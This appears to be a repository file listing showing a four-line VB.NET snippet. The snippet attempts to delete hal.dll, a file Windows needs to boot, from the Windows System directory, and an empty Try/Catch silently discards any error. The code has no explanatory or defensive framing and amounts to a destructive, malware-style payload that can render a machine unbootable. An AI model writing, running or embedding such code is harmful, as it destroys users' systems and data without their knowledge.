Files
2026-08-27 11:04:21 -06:00

4 lines
112 B
Plaintext

Try
IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.System) & "\hal.dll")
Catch
End Try